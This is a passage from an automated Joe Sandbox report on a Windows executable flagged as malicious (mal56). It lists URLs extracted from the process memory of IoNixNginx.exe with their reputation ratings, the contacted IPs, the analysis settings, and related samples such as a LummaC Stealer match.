                            		high
                            https://www.givero.com/suggest?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://crbug.com/dawn/776IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://yandex.com.tr/gorsel/search?rpt=imageviewhttps://www.yandex.com.tr/chrome/newtabIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                              		high
                              https://crbug.com/dawn/1289IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.so.com/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                		high
                                https://crbug.com/dawn/537IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                  		high
                                  https://dk.search.yahoo.com/favicon.icohttps://dk.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://at.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                    		high
                                    http://l.twimg.com/i/hpkp_reportIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://nextdns.io/privacyIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                      		high
                                      https://malaysia.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                        		high
                                        http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?pIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.conduit.com/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                          		high
                                          https://crbug.com/tint.IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://vn.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                            		high
                                            https://developers.google.com/speed/public-dns/privacyGoogleIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                              		high
                                              https://www.ask.com/web?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                		high
                                                https://doh.opendns.com/dns-queryIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                                  		high
                                                  https://ph.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                    		high
                                                    https://www.ecosia.org/newtab/IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                      		high
                                                      http://www.conduit.com/favicon.icohttp://www.conduit.com/search?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                        		high
                                                        https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                          		high
                                                          https://tw.search.yahoo.com/favicon.icohttps://tw.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                            		high
                                                            https://www.delfi.lt/favicon.icohttps://www.delfi.lt/paieska/?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                              		high
                                                              http://search.imesh.net/music?hl=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://qc.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://sug.so.360.cn/suggest?encodein=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                		high
                                                                https://cl.search.yahoo.com/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://yandex.kz/images/search/?rpt=imageviewIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                  		high
                                                                  https://coccoc.com/search#query=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                    		high
                                                                    https://www.yandex.by/chrome/newtabIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                      		high
                                                                      https://crbug.com/dawn/633IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ph.search.yahoo.com/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                        		high
                                                                        http://www.walla.co.il/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                          		high
                                                                          https://crbug.com/dawn/1071IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://go.mail.ru/chrome/newtab/IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                            		high
                                                                            https://id.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                              		high
                                                                              https://uk.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                		high
                                                                                http://www.neti.ee/cgi-bin/otsing?query=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://petalsearch.com/search?query=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                  		high
                                                                                  https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupportIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                    		high
                                                                                    http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://bugs.chromium.org/p/dawn/issues/detail?id=690IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://dns.google/dns-queryIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                      		high
                                                                                      https://ph.search.yahoo.com/favicon.icohttps://ph.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                        		high
                                                                                        https://oceanhero.today/web?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                          		high
                                                                                          https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreatingIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://ch.search.yahoo.com/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                            		high
                                                                                            https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/CloudflareIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                              		high
                                                                                              https://crbug.com/dawn/582IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://crbug.com/dawn/1083IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://crbug.com/dawn/343IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://crbug.com/dawn/342IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://imgs.sapo.pt/images/sapo.icohttp://pesquisa.sapo.pt/?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                		high
                                                                                                https://nl.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                  		high
                                                                                                  https://in.search.yahoo.com/favicon.icohttps://in.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                    		high
                                                                                                    https://search.goo.ne.jp/cdn/common/img/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://crbug.com/tint/1003IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.sogou.com/images/logo/old/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                      		high
                                                                                                      https://in.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                        		high
                                                                                                        http://search.imesh.net/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://crbug.com/dawn/792IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://arianna.libero.it/search/abin/integrata.cgi?query=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://odvr.nic.cz/dohIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                          		high
                                                                                                          https://crbug.com/dawn/673IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://imgs.sapo.pt/images/sapo.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                            		high
                                                                                                            https://search.privacywall.org/suggest.php?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                              		high
                                                                                                              https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                		high
                                                                                                                https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.quad9.net/home/privacy/IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.yandex.ua/chrome/newtabIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://id.search.yahoo.com/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://search.daum.net/search?w=tot&DA=JU5&q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://search.naver.com/search.naver?ie=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://search.daum.net/favicon.icohttps://search.daum.net/search?w=tot&DA=JU5&q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://doh.cleanbrowsing.org/doh/adult-filterIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                            		high

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            172.217.19.228
                                                                                                                            		www.google.comUnited States
                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                            159.100.18.192
                                                                                                                            		unknownGermany
                                                                                                                            		44066DE-FIRSTCOLOwwwfirst-colonetDEfalse
                                                                                                                            172.64.41.3
                                                                                                                            		chrome.cloudflare-dns.comUnited States
                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1574722
                                                                                                                            Start date and time:2024-12-13 14:45:20 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 9m 29s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:64
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:AyqwnIUrcz.exe
                                                                                                                            renamed because original name is a hash value
                                                                                                                            Original Sample Name:d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal56.winEXE@75/167@3/3
                                                                                                                            EGA Information:Failed
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 0
                                                                                                                            • Number of non-executed functions: 0
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.80.35, 13.107.246.63, 20.109.210.53, 184.28.90.27
                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ocsps.ssl.com, ctldl.windowsupdate.com, time.windows.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: AyqwnIUrcz.exe

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            10:31:46API Interceptor386x Sleep call for process: powershell.exe modified

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            159.100.18.192nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              172.64.41.3Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  naukri-launcher 10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                      33abb.msiGet hashmaliciousUnknownBrowse
                                                                                                                                        57ff67.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                            Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
